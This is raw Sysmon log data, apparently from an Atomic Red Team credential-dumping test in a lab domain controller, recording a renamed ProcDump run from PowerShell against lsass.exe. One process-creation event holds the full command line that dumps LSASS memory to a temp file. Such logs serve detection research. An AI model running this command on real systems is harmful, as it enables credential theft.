16:51:14.650{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump64.exe2021-02-03 16:51:14.650 10341000x8000000000000000180232Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.650{29E67E80-D482-601A-4D30-00000000A301}13601416C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x8000000000000000180231Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-02-03 16:51:14.650{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exeHKU\S-1-5-21-1645871015-3279536928-3104981001-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000180230Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180229Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180228Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180227Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180226Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180225Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-84F4-6019-2C05-00000000A301}19284632C:\Windows\system32\csrss.exe{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180224Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.634{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1359ac65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1359a235(wow64) 154100x8000000000000000180223Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:14.637{29E67E80-D482-601A-4D30-00000000A301}1360C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdump"C:\AtomicRedTeam\atomics\T1003.001\bin\notprocdump.exe" -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmpC:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000204797Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-16F0-601B-3C38-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204796Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204795Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204794Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204793Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204792Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-16F0-601B-3C38-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204791Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.520{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-16F0-601B-3C38-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204790Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:40.521{29E67E80-16F0-601B-3C38-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000205103Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.864{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15C0-601B-0B38-00000000A301}4312C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205102Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.864{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15C0-601B-0B38-00000000A301}4312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205101Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15C0-601B-0B38-00000000A301}4312C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205100Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15C0-601B-0B38-00000000A301}4312C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205099Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15C0-601B-0B38-00000000A301}4312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205098Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15A9-601B-0438-00000000A301}208C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205097Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15A9-601B-0438-00000000A301}208C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205096Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15A9-601B-0438-00000000A301}208C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205095Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15A9-601B-0438-00000000A301}208C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205094Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-15A9-601B-0438-00000000A301}208C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205093Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-0038-00000000A301}6056C:\Program 